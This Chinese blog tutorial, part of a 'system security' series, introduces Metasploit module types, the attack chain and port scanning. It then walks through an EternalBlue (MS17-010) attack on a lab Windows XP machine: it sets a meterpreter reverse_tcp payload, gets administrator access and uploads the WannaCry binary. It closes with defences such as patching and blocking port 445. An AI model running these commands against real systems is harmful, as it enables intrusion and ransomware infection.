您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶意代码检测,“系统安全”系列文章会更加聚焦,更加系统,更加深入,也是作者的慢慢成长史。换专业确实挺难的,逆向分析也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~

前文讲解了APT攻击中常用的攻击手段,即PowerShell和PowerSploit脚本攻击,并进一步结合MSF漏洞利用来实现脚本攻击。这篇文章将带领大家了解Metasploit技术,它和CS都是APT攻击中常见的方式,并结合作者之前的漏洞利用及WannaCry逆向经验总结。希望这篇文章对您有帮助,本文参考徐焱老师的《Web安全攻防渗透测试实战指南》著作,谢公子博客,并结合作者之前的博客和经验进行总结。希望这篇文章对您有所帮助,这些大佬是真的值得我们去学习,献上小弟的膝盖~fighting!

文章目录

  • 一.Metasploit简介
  • 二.Metasploit基础普及
    • 1.专业术语
    • 2.渗透步骤及攻击链
  • 三.主机扫描
    • 1.使用辅助模块进行端口扫描
    • 2.使用辅助模块进行服务扫描
    • 3.使用Nmap扫描
  • 四.漏洞利用之MS17-010案例
    • 1.背景知识
    • 2.漏洞利用复现
    • 3.防御措施
  • 五.总结

希望这些基础原理能更好地帮助大家做好防御和保护,基础性文章,希望对您有所帮助。作者作为网络安全的小白,分享一些自学基础教程给大家,主要是在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔!

作者的github资源:

  • 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
  • 网络安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study

从2019年7月开始,我来到了一个陌生的专业——网络空间安全。初入安全领域,是非常痛苦和难受的,要学的东西太多、涉及面太广,但好在自己通过分享100篇“网络安全自学”系列文章,艰难前行着。感恩这一年相识、相知、相趣的安全大佬和朋友们,如果写得不好或不足之处,还请大家海涵!

接下来我将开启新的安全系列,叫“系统安全”,也是免费的100篇文章,作者将更加深入的去研究恶意样本分析、逆向分析、内网渗透、网络攻防实战等,也将通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步,加油~

  • 推荐前文:网络安全自学篇系列-100篇

前文分析:

  • [系统安全] 一.什么是逆向分析、逆向分析基础及经典扫雷游戏逆向
  • [系统安全] 二.如何学好逆向分析及吕布传游戏逆向案例
  • [系统安全] 三.IDA Pro反汇编工具初识及逆向工程解密实战
  • [系统安全] 四.OllyDbg动态分析工具基础用法及Crakeme逆向
  • [系统安全] 五.OllyDbg和Cheat Engine工具逆向分析植物大战僵尸游戏
  • [系统安全] 六.逆向分析之条件语句和循环语句源码还原及流程控制
  • [系统安全] 七.逆向分析之PE病毒原理、C++实现文件加解密及OllyDbg逆向
  • [系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及蓝屏攻击
  • [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度提权
  • [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)复现
  • [系统安全] 十一.那些年的熊猫烧香及PE病毒行为机理分析
  • [系统安全] 十二.熊猫烧香病毒IDA和OD逆向分析(上)病毒初始化
  • [系统安全] 十三.熊猫烧香病毒IDA和OD逆向分析(中)病毒释放机理
  • [系统安全] 十四.熊猫烧香病毒IDA和OD逆向分析–病毒释放过程(下)
  • [系统安全] 十五.Chrome浏览器保留密码功能渗透解析、蓝屏漏洞及某音乐软件漏洞复现
  • [系统安全] 十六.PE文件逆向基础知识(PE解析、PE编辑工具和PE修改)
  • [系统安全] 十七.Windows PE病毒概念、分类及感染方式详解
  • [系统安全] 十八.病毒攻防机理及WinRAR恶意劫持漏洞(脚本病毒、自启动、定时关机、蓝屏攻击)
  • [系统安全] 十九.宏病毒之入门基础、防御措施、自发邮件及APT28宏样本分析
  • [系统安全] 二十.PE数字签名之(上)什么是数字签名及Signtool签名工具详解
  • [系统安全] 二十一.PE数字签名之(中)Signcode、PEView、010Editor、Asn1View工具用法
  • [系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现及Windows验证机制分析
  • [系统安全] 二十三.逆向分析之OllyDbg动态调试复习及TraceMe案例分析
  • [系统安全] 二十四.逆向分析之OllyDbg调试INT3断点、反调试、硬件断点与内存断点
  • [系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
  • [系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及病毒解析
  • [系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向
  • [系统安全] 二十八.WannaCry勒索病毒分析 (4)全网"最"详细的蠕虫传播机制解读
  • [系统安全] 二十九.深信服分享之外部威胁防护和勒索病毒对抗
  • [系统安全] 三十.CS逆向分析 (1)你的游戏子弹用完了吗?Cheat Engine工具入门普及
  • [系统安全] 三十一.恶意代码检测(1)恶意代码攻击溯源及恶意样本分析
  • [系统安全] 三十二.恶意代码检测(2)常用技术详解及总结
  • [系统安全] 三十三.恶意代码检测(3)基于机器学习的恶意代码检测技术
  • [系统安全] 三十四.恶意代码检测(4)编写代码自动提取IAT表、字符串及时间戳溯源地区
  • [系统安全] 三十五.Procmon工具基本用法及文件进程、注册表查看
  • [系统安全] 三十六.APT系列(1)APT攻击溯源防御与常见APT组织的攻击案例
  • [系统安全] 三十七.APT系列(2)远控木马详解与防御及APT攻击中的远控
  • [系统安全] 三十八.APT系列(3)恶意代码与APT攻击中的武器(强推Seak老师)
  • [系统安全] 三十九.APT系列(4)APT攻防溯源普及和医疗数据安全防御总结
  • [系统安全] 四十.APT系列(5)APT组织常用WinRAR漏洞复现(CVE-2018-20250)及恶意软件劫持
  • [系统安全] 四十一.APT系列(6)Python解析PE文件并获取时间戳判断来源区域
  • [系统安全] 四十二.APT系列(7)基于溯源图的APT攻击检测安全顶会论文总结
  • [系统安全] 四十三.APT系列(8)Powershell和PowerSploit脚本渗透攻击手段详解
  • [系统安全] 四十四.APT系列(9)Metasploit技术之基础用法万字详解及防御机理

声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。


一.Metasploit简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发、代码审计、Web应用程序扫描、社会工程等。

Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。Metasploit已成为当前信息安全与渗透测试领域最流行的术语。

Metasploit可向后端模块提供多种用来控制测试的接口,如控制台、Web、CLI。推荐使用控制台接口,通过控制台接口可以访问和使用所有Metasploit的插件,如Payload、利用模块、Post模块等。Metasploit还有第三方程序的接口,比如Nmap、SQLMap等,可以直接在控制台接口使用。

当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

  • https://www.rapid7.com/products/metasploit/download/

这篇文章主要以Kali系统为基础,该操作系统预装了Metasploit,访问该界面,需要在命令行下输入 msfconsole,MSF的启动界面如下图所示。

msfconsole

在使用Kali操作系统时因注意及时更新资源,就像平时更新收集APP一样。更新命令主要包括:

  • apt-get update
    只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新

  • apt-get upgrade
    升级系统上安装的所有软件包

  • apt-get dist-upgrade
    升级整个Linux系统


二.Metasploit基础普及

1.专业术语

MSF框架由多个模块组成,各个模块的功能如下,这也是Web渗透的基础术语。

(1) Auxiliaries:辅助模块
该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。

(2) Exploit:漏洞利用模块
漏洞利用是指由渗透测试者利用一个系统、应用或服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括:

  • 缓冲区溢出
  • Web应用程序攻击
  • 利用配置错误

其中包含攻击者或渗透人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。

(3) Payload:攻击载荷模块
攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码,在Metasploit框架中可以自由地选择、传送和植入。攻击载荷也可能是简单地目标操作系统上执行一些命令,如添加用户账号等。

(4) Post:后期渗透模块
该模块主要用于取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等。

(5) Encoders:编码工具模块
该模块在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来。


2.渗透步骤及攻击链

使用MSF渗透测试时,可以综合使用以上模块,对目标系统进行侦查并发动攻击,大致的步骤如下所示:

  • 扫描目标主机系统,寻找可用漏洞
  • 选择并配置一个漏洞利用模块
  • 选择并配置一个攻击载荷模块
  • 选择一个编码技术,用来绕过杀毒软件的查杀
  • 渗透攻击

注意,实战才是最好的老师,希望大家了解MSF基础用法后,在一些靶场或授权网站上进行渗透测试。同时,为了方便大家理解渗透流程,作者回顾下之前介绍的攻击链。攻击链通常分为七个阶段:

  • 侦查目标(Reconnaissance):侦查目标,充分利用社会工程学了解目标网络。
  • 制作工具(Weaponization):主要是指制作定向攻击工具,例如带有恶意代码的pdf文件或office文件。
  • 传送工具(Delivery):输送攻击工具到目标系统上,常用的手法包括邮件的附件、网站(挂马)、U盘等。
  • 触发工具(Exploitation):利用目标系统的应用或操作系统漏洞,在目标系统触发攻击工具运行。
  • 安装木马(Installation):远程控制程序(特马)的安装,使得攻击者可以长期潜伏在目标系统中。
  • 建立连接(Command and Control):与互联网控制器服务器建立一个C2信道。
  • 执行攻击(Actions on Objectives):执行所需要得攻击行为,例如偷取信息、篡改信息等。


三.主机扫描

扫描和收集信息是渗透测试的第一步,其主要目标是尽可能多地发现有关目标机器的信息。获取的信息越多,渗透的概率越大。该步骤主要的关注点是:

  • 目标主机IP地址
  • 可用服务
  • 开放端口

1.使用辅助模块进行端口扫描

辅助模块是Metasploit的内置模块。

第一步,利用search命令搜索有哪些可用端口模块。

search portscan

从下图中可以看到可用的扫描器列表,其中包含了各种扫描类型。

第二步,以TCP扫描模块为例。输入use命令使用该漏洞利用模块,然后show options查看需要设置的参数。

use auxiliary/scanner/portscan/tcp
show options

输入命令时,按下tab键会自动补齐,输出结果如下图所示。在Required列中,被标记为yes的参数必须包含实际的值,其中:

  • RHOSTS - 设置待扫描的IP地址
  • PORTS - 设置扫描端口范围
  • THREDAS - 设置扫描线程,线程数越高,扫描的速度越多

第三步,使用set命令设置相应参数,查看目标主机开放端口。
当然,也可以使用unset命令取消某个参数值的设置。这里的目标主机是XP系统,其IP地址为 192.168.44.135

具体命令如下,可以看到目标主机开了 135、139、445 三个端口。

set RHOSTS 192.168.44.135
set PORTS 1-500
set THREADS 20
show options
run

输出结果如下图所示。还有两个可选命令,setg和unsetg,二者用于在msfconsole中设置或取消设置全局性的参数值,从而避免重复输入相同的值。


2.使用辅助模块进行服务扫描

在扫描目标机器上运行的服务时,有多种基于服务的扫描技术可供选择,例如VNC、FTP、SMB等,只需执行特定类型的扫描就可以发现服务。

通过 search 命令搜索 scanner 可以发现大量的扫描模块,读者可以尝试不同的辅助扫描模块,了解其功能。使用步骤和使用端口扫描模块时基本相同,后续文章也会陆续介绍不同的用法。

常用的扫描模块包括:

(1) 端口扫描

  • auxiliary/scanner/portscan
    端口扫描

(2) SMB扫描

  • auxiliary/scanner/smb/smb_version
    SMB系统版本扫描
  • auxiliary/scanner/smb/smb_enumusers
    SMB枚举
  • auxiliary/scanner/smb/smb_login
    SMB弱口令扫描
  • auxiliary/scanner/smb/psexec_command
    SMB登录执行命令

(3) SSH扫描

  • auxiliary/scanner/ssh/ssh_login
    SSH登录测试

(4) MSSQL扫描

  • scanner/mssql/mssql_ping
    MSSQL主机信息扫描
  • admin/mssql/mssql_enum
    MSSQL枚举
  • admin/mssql/mssql_exec
    MSSQL执行命令
  • admin/mssql/mssql_sql
    MSSQL查询
  • admin/mssql/mssql_login
    MSSQL弱口令扫描

(5) MySQL扫描

  • auxiliary/admin/mysql/mssql_enum
    MySQL枚举
  • auxiliary/admin/mysql/mssql_sql
    MySQL语句执行
  • auxiliary/scanner/mysql/mssql_login
    MySQL弱口令扫描

(6) SMTP扫描

  • auxiliary/scanner/smtp/smtp_version
    SMTP版本扫描
  • auxiliary/scanner/smtp/smtp_enum
    SMTP枚举

(7) 其他

  • auxiliary/scanner/snmp/community
    SNMP扫描设备
  • auxiliary/scanner/telnet/telnet_login
    Telnet登录
  • scanner/vnc/vnc_none_auth
    VNC空口令扫描

3.使用Nmap扫描

在Metasploit中同样可以使用Nmap扫描,Nmap不仅可以用来确定目标网络上计算机的存活状态,而且可以扫描计算机的操作系统、开放端口、服务等。熟练掌握Nmap的用法可以极大地提高个人的渗透测试技术。

实际上,在msf命令提示符下输入nmap,就可以显示Nmap提供的扫描选项列表,如下图所示:

我们要获取目标主机的操作系统,则输入 nmap -O -Pn/-p0 URI 命令,其中Pn和-p0参数是不使用ping的方式,而假定所有主机系统都是活动的,可以穿透防火墙,也可以避免防火墙发现。运行如下图所示:

nmap -O -Pn 192.168.44.135

输出结果如下图所示,可以看到目标主机的操作系统如下,后续作者会详细写一篇文章介绍Nmap的用法。

  • Windows 2000 | XP


四.漏洞利用之MS17-010案例

每个操作系统都会存在各种漏洞,像微公司会快速针对漏洞进行打补丁,供用户提供更新。而没有公布补丁的Bug就是所谓的0day漏洞,其危害极大,也很受黑客和安全人员的喜爱。

实际上,像微软这样的公司都会针对自己的产品定期发布补丁,但是否下载取决于用户自身。由于安全意识薄弱的个人或中小企业往往会忽略这些工作,打补丁可能会影响平时的工作,这种1day漏洞所造成的伤害也非常严重。

下面我们对Windows XP系统进行MS17-010漏洞的复现,前面我通过四篇文章逆向WannaCry时,详细复现过该漏洞,希望大家喜欢。

  • [网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读

1.背景知识

2017年5月12日,WannaCry蠕虫通过永恒之蓝MS17-010漏洞在全球范围大爆发,感染大量的计算机。WannaCry勒索病毒全球大爆发,至少150个国家、30万名用户中招,造成损失达80亿美元,已影响金融、能源、医疗、教育等众多行业,造成严重的危害。

WannaCry是一种“蠕虫式”勒索病毒软件,由不法分子利用NSA泄露方程式工具包的危险漏洞“EternalBlue”(永恒之蓝)进行传播。该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密。

WannaCry利用Windows系统的SMB漏洞获取系统的最高权限,该工具通过恶意代码扫描开放445端口的Windows系统。被扫描到的Windows系统,只要开机上线,不需要用户进行任何操作,即可通过SMB漏洞上传WannaCry勒索病毒等恶意程序。

WannaCry利用永恒之蓝漏洞进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry蠕虫进行感染,并作为攻击机再次扫描互联网和局域网的其他机器,行成蠕虫感染大范围超快速扩散。其核心流程如下图所示:

WannaCry勒索病毒主要行为是传播和勒索。

  • 传播:利用基于445端口的SMB漏洞MS17-010(永恒之蓝)进行传播
  • 勒索:释放文件,包括加密器、解密器、说明文件、语言文件等;加密文件;设置桌面背景、窗体信息及付款账号等。

2.漏洞利用复现

实验环境:

  • 攻击机:Kali-linux-2019.2 IP:192.168.44.138
  • 受害主机:WinXP 64位 IP:192.168.44.135

实验工具:

  • metasploit
  • MS17-010
  • Wcry.exe

实验步骤:

  • 配置Windows XP、Kali实验环境
  • Kali检测受害主机445端口(SMB协议)是否开启
  • 运行EternalBlue永恒之蓝漏洞(MS17-010)反弹shell
  • 上传勒索病毒wcry.exe并运行实现勒索和文件加密(该文章不实现)

切记、切记、切记:实验复现过程中必须在虚拟机中完成,运行之前关闭虚拟机Win7文件共享,真机上一旦被感染你就真的只能想哭了(wannacry)。同时,该实验比上一篇文章精简很多,更推荐该方法。

第一步,保证攻击机和受害机相互通讯,均在同一个局域网中。


第二步,扫描靶机是否开启445端口。

  • nmap -sS 192.168.44.135


第三步,打开msfconsole并查询MS17-010漏洞模块。
这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。推荐读者看看NSA泄露的方程式工具包,其中永恒之蓝(eternalblue)就是著名的漏洞。

  • msfconsole
  • search ms17-010


第四步,利用永恒之蓝漏洞并设置参数。

  • use exploit/windows/smb/ms17_010_eternalblue
    利用永恒之蓝漏洞
  • set payload windows/x64/meterpreter/reverse_tcp
    设置payload
  • set LHOST 192.168.44.138
    设置本机IP地址
  • set RHOSTS 192.168.44.135
    设置受害主机IP
  • set RPORT 445
    设置端口445,注意该端口共享功能是高危漏洞端口,包括之前分享的139、3389等
  • exploit
    利用漏洞

通过 show options 可以查看我们设置的参数值。

注意,这里Win7和Win XP系统设置略有区别。如果用Win7的模块去攻击XP系统,会造成计算机重启,攻击失败,如下图所示。

Windows XP设置的exp如下:

  • exploit/windows/smb/ms17_010_eternalblue

运行成功结果如下图所示:


第五步,成功获取Windows系统管理员权限。

  • pwd、ls
    查看当前路径及目录
  • getuid
    返回系统管理员权限


第六步,在目标主机上创建文件,尝试控制目标。

cd ..
# 创建文件夹
mkdir hacker
# 访问目录
dir
cd hacker
# 创建文件并写入内容
echo helloworld>test.txt
# 查看目标系统的基本信息
sysinfo


第七步,上传WannaCry。再次强调,虚拟机中运行该实验,并且关闭文件共享功能,同时蠕虫和漏洞利用分析是为了帮助大家了解原理进行防御。

  • shell
  • upload /root/wcry.exe c:\

运行病毒程序后的界面如下图所示,已经成功被勒索。再次强调,所有代码必须在虚拟机中执行,并且关闭文件共享。

WannaCry蠕虫加密系统中的文件,被加密的文件后缀名统一修改为“.WNCRY”。

  • b.wnry: 中招敲诈者后桌面壁纸
  • c.wnry: 配置文件,包含洋葱域名、比特币地址、tor下载地址等
  • f.wnry: 可免支付解密的文件列表
  • r.wnry: 提示文件,包含中招提示信息
  • s.wnry: zip文件,包含Tor客户端
  • t.wnry: 测试文件
  • u.wnry: 解密程序


3.防御措施

至此,我们已经成功利用了MS17-010漏洞实现入侵,其防御常见的措施如下:

  • 开启系统防火墙
  • 关闭445、139等端口连接
  • 开启系统自动更新,下载并更新补丁,及时修复漏洞
  • 为计算机安全最新补丁,微软已经发布补丁MS17-010修复该漏洞,读者也可以通过第三方工具下载补丁
  • 安装安全软件,开启主动防御进行拦截查杀
  • 如非服务需要,建议把高危漏洞的端口都关闭,比如 135、137、138、139、445、3389 等
  • 开启防火墙,及时备份重要文件

由于WannaCry等勒索病毒主要通过445端口入侵计算机,关闭的方法如下:

  • 控制面板–>windows防火墙—>高级选项–>入站规则
  • 新建规则–>选择端口–>指定端口号445
  • 选择阻止连接–>配置文件全选–>规则名称–>成功关闭

实验在虚拟机中进行,也需要关闭共享文件夹功能,如下图所示。


五.总结

写到这里,这篇文章就介绍完毕,希望您喜欢,本文主要是学习徐焱老师他们的《Web安全攻防渗透测试实战指南》,同时结合作者之前的漏洞利用及WannaCry逆向经验总结。

  • 一.Metasploit简介
  • 二.Metasploit基础普及
    1.专业术语
    2.渗透步骤及攻击链
  • 三.主机扫描
    1.使用辅助模块进行端口扫描
    2.使用辅助模块进行服务扫描
    3.使用Nmap扫描
  • 四.漏洞利用之MS17-010案例
    1.背景知识
    2.漏洞利用复现
    3.防御措施

这篇文章中如果存在一些不足,还请海涵。作者作为网络安全初学者的慢慢成长路吧!希望未来能更透彻撰写相关文章。同时非常感谢参考文献中的安全大佬们的文章分享,深知自己很菜,得努力前行。

欢迎大家讨论,是否觉得这系列文章帮助到您!任何建议都可以评论告知读者,共勉。

  • 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
  • 网络安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study

学安全两年,认识了很多安全大佬和朋友,希望大家一起进步。这篇文章中如果存在一些不足,还请海涵。作者作为网络安全初学者的慢慢成长路吧!希望未来能更透彻撰写相关文章。同时非常感谢参考文献中的安全大佬们的文章分享,深知自己很菜,得努力前行。

(By:Eastmount 2022-01-13 夜于武汉 http://blog.csdn.net/eastmount/ )


参考文章如下,感谢这些大佬。

  • [1] https://www.rapid7.com/products/metasploit/download/
  • [2] 《Web安全攻防渗透测试实战指南》徐焱、李文轩、王东亚老师
  • [3] https://blog.csdn.net/Eastmount

[系统安全] 四十四.APT系列(9)Metasploit技术之基础用法万字详解及防御机理相关推荐

  1. [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  2. [Python从零到壹] 四十五.图像增强及运算篇之图像灰度非线性变换详解

    欢迎大家来到"Python从零到壹",在这里我将分享约200篇Python系列文章,带大家一起去学习和玩耍,看看Python这个有趣的世界.所有文章都将结合案例.代码和作者的经验讲 ...

  3. [网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及防御机理

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了中间人攻击或ARP欺骗攻击,从ARP原理到局域网配置进行描述.这篇文章 ...

  4. python接口自动化(四十二)- 项目架构设计之大结局(超详解)

    简介 这一篇主要是将前边的所有知识做一个整合,把各种各样的砖块-模块(post请求,get请求,logging,参数关联,接口封装等等)垒起来,搭建一个房子.并且有很多小伙伴对于接口项目测试的框架一筹 ...

  5. python +appium实现原理_Appium+python自动化(四十)-Appium自动化测试框架综合实践 - 代码实现(超详解)...

    #coding=utf-8#1.先设置编码,utf-8可支持中英文,如上,通常放在第一行 #2.注释:包括记录建立时间,建立人,项目名称. '''Created on 2019-11-18 @auth ...

  6. [网络安全自学篇] 四十一.中间人攻击和ARP欺骗原理详解及防御机理

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了一个phpMyAdmin 4.8.1版本的文件包含漏洞,从配置到原理, ...

  7. 【Linux从青铜到王者】第十五篇:Linux网络编程套接字两万字详解

    系列文章目录 文章目录 系列文章目录 前言 一.网络数据的五元组信息 1.理解源IP地址和目的IP地址 2.理解 "端口号" 和 "进程ID" 3.理解源端口号 ...

  8. [Python从零到壹] 六十四.图像识别及经典案例篇之图像傅里叶变换和傅里叶逆变换详解

    祝大家新年快乐,阖家幸福,健康快乐! 欢迎大家来到"Python从零到壹",在这里我将分享约200篇Python系列文章,带大家一起去学习和玩耍,看看Python这个有趣的世界.所 ...

  9. Android面试基础之BroadcastReceiver详解(斗帝养成系列四)

    斗帝养成 大斗师,一至九星,斗气铠甲,斗气外放,聚气化固态,呈菱形.别说自己尽力了,那只是自欺欺人的假话. Android面试基础之Activity详解(斗帝养成系列一) Android面试基础之Se ...

最新文章

  1. linux 循环shell脚本,shell脚本的使用---for循环
  2. vue.js插件使用(01) vue-resource
  3. Jdom的SAXBuilder解析String形式的XML
  4. c语言模板程序,模板模式 (C语言实现)
  5. 【C++ Primer | 19】控制内存分配
  6. 协议簇: Media Access Control(MAC) Frame 解析
  7. [Python] Django+Apache 报 [wsgi:error]问题解决
  8. Eclipse是否必需要安装jdk,jre
  9. OpenShift 4 - 基于URL的应用路由
  10. java工程师写html_java工程师_基础_阶段一_HTML笔记篇
  11. MAC下邮件客户端操作——解决无法登陆GMail IMAP服务器
  12. 一个屌丝程序员的青春(一一零)
  13. 英语学习笔记——发音篇
  14. macOS High Sierra 10.13.6 Nvidia显卡webdriver 证书失效 无法打开控制面板 解决方法
  15. luogu P4117 [Ynoi2018] 五彩斑斓的世界
  16. 使用知行之桥EDI系统进行OFTP连接需要准备什么?
  17. Locale.getDefault()的用法
  18. 关于编号/编码命名的问题
  19. 《GitHub入门与实践》第3章 使用GitHub的前期准备——学习笔记
  20. 问题导向VS目标导向

热门文章

  1. 常见java面试题 普通类和抽象类的区别?
  2. 如何在线创建索引或者重构索引
  3. alter database open resetlogs
  4. Linux(Redhat5.5)配置时间服务器(Ntp)法
  5. php - 冒泡排序
  6. 余玄相似度,TF-IDF
  7. ubuntu部署git
  8. 面向对象编程,链式调用,先输出‘hello’,10秒之后,输出‘world’
  9. 链接服务器 '(null)' 的 OLE DB 访问接口'STREAM' 返回了对列 '[!BulkInsert].field' 无效的数据...
  10. 堆栈被无意中修改导致程序挂掉